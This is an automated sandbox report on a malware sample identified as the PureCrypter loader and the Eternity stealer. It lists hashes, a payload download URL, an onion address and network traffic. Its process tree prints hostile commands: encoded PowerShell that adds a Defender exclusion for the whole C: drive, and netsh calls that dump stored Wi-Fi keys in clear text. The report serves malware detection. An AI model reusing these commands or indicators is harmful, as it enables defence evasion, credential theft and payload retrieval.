Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
90s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
01/02/2023, 20:12 UTC
General
-
Target
newsoftware-tester.exe
-
Size
6KB
-
MD5
d785e46b0d269b0578dcfd1b90375a6a
-
SHA1
d1c4a196f24f0659c29fb05e99e690c87bf6d673
-
SHA256
164df1aecac769eb2d9485abcb776f9ee55fc1e297c5b8b2bc50009e786d41b2
-
SHA512
ea93bf91f0035a2996f227e04ccca718a9a470ca477e2e5af12a5180c70c62d6efcdbfd29d40e0458baa5ebdd525b5281e342ec29d01fc6fc9173a5b625704c3
-
SSDEEP
96:673zsN+JBcMAiLt6NkIJmaI8RP4e/kvHxNezNt:oo+MOLtErRJcvb4
Malware Config
Extracted
purecrypter
http://justnormalsite.ddns.net/SystemEnv/uploads/newsoftware-tester_Ilbiekxz.png
Extracted
eternity
http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion
Signatures
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 56 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\newsoftware-tester.exe"C:\Users\Admin\AppData\Local\Temp\newsoftware-tester.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig/release2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /release3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig/renew2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew3⤵
- Gathers network information
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe2⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe2⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile4⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr All4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile name="65001" key=clear | findstr Key3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile name="65001" key=clear4⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr Key4⤵
-
-
-
Network
-
DNSjustnormalsite.ddns.netRemote address:8.8.8.8:53Requestjustnormalsite.ddns.netIN AResponsejustnormalsite.ddns.netIN A172.245.21.202 -
GEThttp://justnormalsite.ddns.net/SystemEnv/uploads/newsoftware-tester_Ilbiekxz.pngRemote address:172.245.21.202:80RequestGET /SystemEnv/uploads/newsoftware-tester_Ilbiekxz.png HTTP/1.1
Host: justnormalsite.ddns.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Wed, 01 Feb 2023 20:12:30 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Sat, 28 Jan 2023 18:39:31 GMT
ETag: "284e00-5f3574d87543b"
Accept-Ranges: bytes
Content-Length: 2641408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
-
DNSip-api.comRemote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
GEThttp://ip-api.com/jsonRemote address:208.95.112.1:80RequestGET /json HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Wed, 01 Feb 2023 20:13:28 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 305
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
DNSt.meRemote address:8.8.8.8:53Requestt.meIN AResponset.meIN A149.154.167.99
-
GEThttps://t.me/tor_proxiesRemote address:149.154.167.99:443RequestGET /tor_proxies HTTP/1.1
Host: t.me
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 01 Feb 2023 20:13:31 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10968
Connection: keep-alive
Set-Cookie: stel_ssid=d2870f56805d9bf514_6640870139364869811; expires=Thu, 02 Feb 2023 20:13:31 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
-
DNSpastebin.comRemote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A172.67.34.170pastebin.comIN A104.20.68.143pastebin.comIN A104.20.67.143
-
GEThttps://pastebin.com/raw/qz6Q5qekRemote address:172.67.34.170:443RequestGET /raw/qz6Q5qek HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Wed, 01 Feb 2023 20:13:31 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Wed, 01 Feb 2023 20:13:31 GMT
Server: cloudflare
CF-RAY: 792d59208d38b79a-AMS
-
93.184.221.240:80
-
172.245.21.202:80http://justnormalsite.ddns.net/SystemEnv/uploads/newsoftware-tester_Ilbiekxz.pnghttp
HTTP Request
GET http://justnormalsite.ddns.net/SystemEnv/uploads/newsoftware-tester_Ilbiekxz.pngHTTP Response
200 -
93.184.221.240:80
-
20.189.173.1:443
-
208.95.112.1:80http://ip-api.com/jsonhttp
HTTP Request
GET http://ip-api.com/jsonHTTP Response
200 -
149.154.167.99:443https://t.me/tor_proxiestls, http
HTTP Request
GET https://t.me/tor_proxiesHTTP Response
200 -
172.67.34.170:443https://pastebin.com/raw/qz6Q5qektls, http
HTTP Request
GET https://pastebin.com/raw/qz6Q5qekHTTP Response
200 -
65.21.24.88:10001
-
87.248.202.1:80
-
93.184.221.240:80
-
8.8.8.8:53justnormalsite.ddns.netdns
DNS Request
justnormalsite.ddns.net
DNS Response
172.245.21.202
-
8.8.8.8:53ip-api.comdns
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
8.8.8.8:53t.medns
DNS Request
t.me
DNS Response
149.154.167.99
-
8.8.8.8:53pastebin.comdns
DNS Request
pastebin.com
DNS Response
172.67.34.170104.20.68.143104.20.67.143
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
16KB
MD51d1dbecb0757e04b446e85a5079786f9
SHA10deddd438e4d56671bac4013542929e9de6ca487
SHA2563759c5ede174c4e1749f86c7ff6d9f2dd56d6c8f070cad7af043805cd1fd89fb
SHA512fea4e02d6f535f295290065e2863b7594d97d4a8b65b709791c2a51369a7ab0e4e3a6c2625f1eeee185ad31e7dd8b67dd51887cdcabf05a6005c5e0e2d7d4e43
-
Filesize
6.5MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
120KB
-
Filesize
104KB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
360KB
-
Filesize
624KB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
320KB
-
Filesize
200KB
-
Filesize
600KB
-
Filesize
32KB
-
Filesize
304KB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
56KB
-
Filesize
120KB
-
Filesize
32KB
-
Filesize
136KB